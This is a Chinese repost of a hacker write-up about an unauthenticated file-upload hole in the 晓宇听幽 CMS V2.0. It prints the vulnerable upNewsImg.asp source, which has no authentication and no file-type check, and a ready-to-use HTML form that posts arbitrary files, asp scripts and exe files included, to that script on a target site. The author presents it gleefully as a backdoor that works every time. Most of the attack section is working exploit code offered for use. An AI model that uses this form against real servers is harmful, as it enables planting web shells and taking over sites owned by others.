当前位置：首页 > 资讯 > 技术文档

晓宇听幽网站内容管理系统 V2.0

时间：2021-07-10 06:31 编辑：来源：阅读：
扫一扫，手机访问

摘要：晓宇听幽网站内容管理系统 V2.0

(作者给我们留下后门?) 晓宇听幽网站内容管理系统: 目前最强大整站系统：包含一般网站所必须的模块如新闻文章、下载、影视、图片、音乐等各模块相互独立又紧密联系，无限分级，自由调用，支持模板，前台全部生成html，最大程度节省系统资源，大中型门户网站的最佳选择内容页面是生成html,比较安全,后台地方看了一下,好像也问题不大. 但是转到upload目录,发现两个文件 uploadset.asp upNewsIMg.asp 其中uploadset.asp中做了验证,而upNewsImg.asp中没有任何限制,我们来看一下源代码: CODE: <link rel="stylesheet" type="text/css" href="../admin/admin.css"> <script language="JavaScript">  </script> <% server.scripttimeout=1900 %> <% UpFilePath="NewsIMG/" fileweb="UPLOAD/" nameset =1 pathset =0 dim i i=1 %> <% function makefilename(fname) fname = now() fname = replace(fname,"-","") fname = replace(fname," ","") fname = replace(fname,":","") makefilename=fname end function %>  <% dim upload,file,formName,iCount dim url,url1 set upload=new upload_5xSoft ’’建立上传对象 iCount=0 for each formName in upload.file ’’列出所有上传了的文件 set file=upload.file(formName) ’’生成一个文件对象 if file.FileSize>0 then ’’如果 FileSize > 0 说明有文件数据 fname = makefilename(now()) & iCount & "." & GetExtendName(file.FileName) file.SaveAs Server.mappath(UpFilePath&fname) ’’保存文件 iCount=iCount+1 response.write"图片"&i&" <input type=""text"" name="""&i&""" size=""55"" style=""border-style: solid; border-width: 1"" value=""../"&fileweb&UpFilePath&fname&"""><br>[ <a href=# onclick=""Addpic(’../"&fileweb&UpFilePath&fname&"’)"">点击这里把图片"&i&"添加到编辑器中</a> ]<br>" i=i+1 set file=nothing end if next set upload=nothing ’’删除此对象 function GetExtendName(FileName) dim ExtName ExtName = LCase(FileName) ExtName = right(ExtName,3) ExtName = right(ExtName,3-Instr(ExtName,".")) GetExtendName = ExtName end function %> [Copy to clipboard] 哈哈,完全可以自己购造一个上传页面,直接上传,连exe文件都可以,别说asp什么的啦. 而且上传完就有地址,简直就是作者给我们留的一个后门. 利用文件: CODE: <html> <head> <title>文件上传</title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> </head> <body bgcolor="#D6EF7E" text="#000000"> <form name="form1" method="post" action="http://www.target.com/upload/upnewsimg.asp" enctype="multipart/form-data"> <input type="hidden" name="act" value="upload"> <div align="center"> <center> <table width="98%" border="0" cellspacing="0" cellpadding="5" bordercolordark="#CCCCCC" bordercolorlight="#000000" style="border-collapse: collapse" bordercolor="#111111" height="102"> <tr> <th height="16" align="left" valign="middle"> <div align="center"> <b>图片上传</b> </div> </th> </tr> <tr align="left" valign="middle" bgcolor="#eeeeee"> <td bgcolor="#FFFFFF" height="1" valign="top"> <input type="file" name="file1" style="width:200" class="tx1"> </td> </tr> <tr align="center" valign="middle"> <td align="left" id="upid" height="5" bgcolor="#FFFFFF"> </td> </tr> <tr align="center" valign="middle" bgcolor="#eeeeee"> <td bgcolor="#FFFFFF" height="28"> <input type="submit" name="Submit" value="· 提交 ·" class="bt"> <input type="reset" name="Submit2" value="· 重执 ·" class="bt"></td> </tr> <tr align="center" valign="middle" bgcolor="#eeeeee"> <td height="14" bgcolor="#FFFFFF">　</td> </tr> </table> </center> </div> </form> </body> </html> [Copy to clipboard] 百发百中,哈哈.好玩. 我的Blog http://hhuai.cn 文章：坏坏来源：邪恶八进制信息安全团队

全部评论(0)

上一篇：三则黑客的Google搜索技巧
下一篇：WDB论坛存在多个严重漏洞

资讯排行榜
更多>>